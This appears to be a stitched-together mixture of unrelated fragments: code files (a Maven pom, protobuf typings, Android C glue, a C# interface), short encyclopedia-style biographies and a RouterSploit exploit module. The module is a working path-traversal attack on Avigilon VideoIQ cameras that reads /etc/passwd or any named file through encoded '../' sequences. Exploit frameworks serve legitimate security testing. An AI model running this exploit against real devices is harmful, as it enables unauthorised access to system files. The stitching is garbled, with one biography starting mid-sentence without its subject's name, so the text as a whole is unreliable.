u=sb_gt()-h,s=u>=f;i=e+(o-e)*u/f;s&&(t.stop(),i=o);n(c,i);s&&r&&r()};t.getInterval=function(){return s}},sj_fader=function(){return new sj_anim(function(n,t){sj_so(n,t)})};define("framework",["require","exports","event.custom"],function(n,t,i){i.bind("onPP",function(){i.fire("onP1Lazy")},!0)}) ```
```smalltalk // ========================================================================== // Squidex Headless CMS // ========================================================================== // ========================================================================== namespace Squidex.Domain.Apps.Core.Schemas; public interface IRootField : IField { Partitioning Partitioning { get; } } ```
```xml <!-- path_to_url Unless required by applicable law or agreed to in writing, software WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. --> <project xmlns="path_to_url" xmlns:xsi="path_to_url" xsi:schemaLocation="path_to_url path_to_url"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.thingsboard</groupId> <version>3.7.1-SNAPSHOT</version> <artifactId>thingsboard</artifactId> </parent> <groupId>org.thingsboard</groupId> <artifactId>ui-ngx</artifactId> <packaging>jar</packaging> <name>ThingsBoard Server UI</name> <url>path_to_url <properties> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <main.dir>${basedir}/..</main.dir> </properties> <build> <resources> <resource> <directory>${project.build.directory}/generated-resources</directory> </resource> </resources> <plugins> <plugin> <groupId>com.github.eirslett</groupId> <artifactId>frontend-maven-plugin</artifactId> <configuration> <installDirectory>target</installDirectory> <workingDirectory>${basedir}</workingDirectory> </configuration> <executions> <execution> <id>install node and npm</id> <goals> <goal>install-node-and-yarn</goal> </goals> <configuration> <nodeVersion>v20.11.1</nodeVersion> <yarnVersion>v1.22.17</yarnVersion> </configuration> </execution> <execution> <id>yarn install</id> <goals> <goal>yarn</goal> </goals> <configuration> <arguments>install --non-interactive --network-concurrency 4 --network-timeout 100000 --mutex network</arguments> </configuration> </execution> </executions> </plugin> </plugins> </build> <profiles> <profile> <id>yarn-build</id> <activation> <activeByDefault>true</activeByDefault> </activation> <build> <plugins> <plugin> <groupId>com.github.eirslett</groupId> <artifactId>frontend-maven-plugin</artifactId> <configuration> <installDirectory>target</installDirectory> <workingDirectory>${basedir}</workingDirectory> </configuration> <executions> <execution> <id>yarn build</id> <goals> <goal>yarn</goal> </goals> <configuration> <arguments>run build:prod</arguments> </configuration> </execution> </executions> </plugin> </plugins> </build> </profile> <profile> <id>yarn-start</id> <activation> <property> <name>yarn-start</name> </property> </activation> <build> <plugins> <plugin> <groupId>com.github.eirslett</groupId> <artifactId>frontend-maven-plugin</artifactId> <configuration> <installDirectory>target</installDirectory> <workingDirectory>${basedir}</workingDirectory> </configuration> <executions> <execution> <id>yarn start</id> <goals> <goal>yarn</goal> </goals> <configuration> <arguments>start</arguments> </configuration> </execution> </executions> </plugin> </plugins> </build> </profile> </profiles> </project> ```
Elliot Richardson (1920–1999) was Attorney General of the United States. Attorney General Richardson may also refer to: Selwyn Richardson (1935–1995), Attorney-General of Trinidad and Tobago William P. Richardson (Ohio politician) (1824–1886), Attorney General of Ohio See also General Richardson (disambiguation)
```python from routersploit.core.exploit import * from routersploit.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { "name": "Avigilon VideoIQ Camera Path Traversal", "description": "Module exploits Avigilon VideoIQ Camera Path Traversal vulnerability. If target is vulnerable " "it is possible to read file from file system.", "authors": ( "Yakir Wizman", # vulnerability discovery "Marcin Bury <marcin[at]threat9.com>", # routersploit module ), "references": ( "path_to_url", ), "devices": ( "VideoIQ Camera", ), } target = OptIP("", "Target IPv4 or IPv6 address") port = OptPort(8080, "Target HTTP port") filename = OptString("/etc/passwd", "File to read from filesystem") def run(self): if self.check(): print_success("Target seems to be vulnerable") path = "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{}".format(self.filename) response = self.http_request( method="GET", path=path ) if response is None: print_error("Exploit failed - could not read response") return print_status("Trying to read file: {}".format(self.filename)) if any(err in response.text for err in ["Error 404 NOT_FOUND", "Problem accessing", "HTTP ERROR 404"]): print_status("File does not exist: {}".format(self.filename)) return if response.text: print_info(response.text) else: print_status("File seems to be empty") else: print_error("Exploit failed - target seems to be not vulnerable") @mute def check(self): path = "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" response = self.http_request( method="GET", path=path ) if response and utils.detect_file_content(response.text, "/etc/passwd"): return True # target is vulnerable return False # target is not vulnerable ```
Richard Emanuel Winterbottom (22 July 1899 – 9 February 1968) was a British Labour Party politician. Born in Oldham, Lancashire, Winterbottom served in the Royal Navy during World War I. He became an area organiser for a predecessor of the Union of Shop, Distributive and Allied Workers in 1931, then the national organiser in 1944. In 1950, he was elected as the Member of Parliament (MP) for Sheffield Brightside, serving for his first year as Parliamentary Private Secretary to Ness Edwards. Winterbottom remained in Parliament until his death in 1968. References M. Stenton and S. Lees, Who's Who of British Members of Parliament, Volume IV 1945-1979 External links 1899 births 1968 deaths Labour Party (UK) MPs for English constituencies Politics of Sheffield UK MPs 1950–1951 UK MPs 1951–1955 UK MPs 1955–1959 UK MPs 1959–1964 UK MPs 1964–1966 UK MPs 1966–1970 Politicians from Oldham
```xml // package: pulumirpc // file: pulumi/plugin.proto /* tslint:disable */ /* eslint-disable */ import * as jspb from "google-protobuf"; export class PluginInfo extends jspb.Message { getVersion(): string; setVersion(value: string): PluginInfo; serializeBinary(): Uint8Array; toObject(includeInstance?: boolean): PluginInfo.AsObject; static toObject(includeInstance: boolean, msg: PluginInfo): PluginInfo.AsObject; static extensions: {[key: number]: jspb.ExtensionFieldInfo<jspb.Message>}; static extensionsBinary: {[key: number]: jspb.ExtensionFieldBinaryInfo<jspb.Message>}; static serializeBinaryToWriter(message: PluginInfo, writer: jspb.BinaryWriter): void; static deserializeBinary(bytes: Uint8Array): PluginInfo; static deserializeBinaryFromReader(message: PluginInfo, reader: jspb.BinaryReader): PluginInfo; } export namespace PluginInfo { export type AsObject = { version: string, } } export class PluginDependency extends jspb.Message { getName(): string; setName(value: string): PluginDependency; getKind(): string; setKind(value: string): PluginDependency; getVersion(): string; setVersion(value: string): PluginDependency; getServer(): string; setServer(value: string): PluginDependency; getChecksumsMap(): jspb.Map<string, Uint8Array | string>; clearChecksumsMap(): void; serializeBinary(): Uint8Array; toObject(includeInstance?: boolean): PluginDependency.AsObject; static toObject(includeInstance: boolean, msg: PluginDependency): PluginDependency.AsObject; static extensions: {[key: number]: jspb.ExtensionFieldInfo<jspb.Message>}; static extensionsBinary: {[key: number]: jspb.ExtensionFieldBinaryInfo<jspb.Message>}; static serializeBinaryToWriter(message: PluginDependency, writer: jspb.BinaryWriter): void; static deserializeBinary(bytes: Uint8Array): PluginDependency; static deserializeBinaryFromReader(message: PluginDependency, reader: jspb.BinaryReader): PluginDependency; } export namespace PluginDependency { export type AsObject = { name: string, kind: string, version: string, server: string, checksumsMap: Array<[string, Uint8Array | string]>, } } export class PluginAttach extends jspb.Message { getAddress(): string; setAddress(value: string): PluginAttach; serializeBinary(): Uint8Array; toObject(includeInstance?: boolean): PluginAttach.AsObject; static toObject(includeInstance: boolean, msg: PluginAttach): PluginAttach.AsObject; static extensions: {[key: number]: jspb.ExtensionFieldInfo<jspb.Message>}; static extensionsBinary: {[key: number]: jspb.ExtensionFieldBinaryInfo<jspb.Message>}; static serializeBinaryToWriter(message: PluginAttach, writer: jspb.BinaryWriter): void; static deserializeBinary(bytes: Uint8Array): PluginAttach; static deserializeBinaryFromReader(message: PluginAttach, reader: jspb.BinaryReader): PluginAttach; } export namespace PluginAttach { export type AsObject = { address: string, } } ```
```c #include <android/log.h> #include <dlfcn.h> #include <fcntl.h> #include <stdint.h> #include <string.h> #include "_cgo_export.h" #define LOG_FATAL(...) __android_log_print(ANDROID_LOG_FATAL, "Go", __VA_ARGS__) int main_running = 0; // ANativeActivity_onCreate implements the application's entry point. // // This is the function that must be in the native code to instantiate // the application's native activity. It is called with the activity // instance; if the code is being instantiated from a // previously saved instance, the savedState will be non-NULL and // point to the saved data. You must make any copy of this data you // need it will be released after you return from this function. // // See path_to_url // // The Activity may be created and destroyed multiple times throughout // the life of a single process. Each time, onCreate is called. void ANativeActivity_onCreate(ANativeActivity *activity, void* savedState, size_t savedStateSize) { if (!main_running) { // Call the Go main.main. uintptr_t mainPC = (uintptr_t)dlsym(RTLD_DEFAULT, "main.main"); if (!mainPC) { LOG_FATAL("missing main.main"); } callMain(mainPC); main_running = 1; } // Set the native activity callbacks, see: // path_to_url activity->callbacks->onStart = onStart; activity->callbacks->onResume = onResume; activity->callbacks->onSaveInstanceState = onSaveInstanceState; activity->callbacks->onPause = onPause; activity->callbacks->onStop = onStop; activity->callbacks->onDestroy = onDestroy; activity->callbacks->onWindowFocusChanged = onWindowFocusChanged; activity->callbacks->onNativeWindowCreated = onNativeWindowCreated; activity->callbacks->onNativeWindowRedrawNeeded = onNativeWindowRedrawNeeded; activity->callbacks->onNativeWindowDestroyed = onNativeWindowDestroyed; activity->callbacks->onInputQueueCreated = onInputQueueCreated; activity->callbacks->onInputQueueDestroyed = onInputQueueDestroyed; activity->callbacks->onConfigurationChanged = onConfigurationChanged; activity->callbacks->onLowMemory = onLowMemory; onCreate(activity); } ```
Autonomedia is a nonprofit publisher based in Williamsburg, Brooklyn known for publishing works of criticism. they were staffed by volunteers and had published over 200 books, usually with 3,000 of each run. As of 2003 its most well-known book was Hakim Bey's essays on autonomy, Temporary Autonomous Zone. When Bey died in 2022 it was still one of the publisher's bestsellers with sales of over 50,000. Circa 1982, Autonomedia became the parent publisher for Semiotext(e), an imprint known for publishing translations of French post-structuralist literature. References External links Book publishing companies based in New York City Anarchist organizations in the United States Political book publishing companies Anarchist publishing companies 1982 establishments in New York City
was a Japanese freestyle swimmer. She competed in two events at the 1936 Summer Olympics. References External links 1921 births Possibly living people Japanese female freestyle swimmers Olympic swimmers for Japan Swimmers at the 1936 Summer Olympics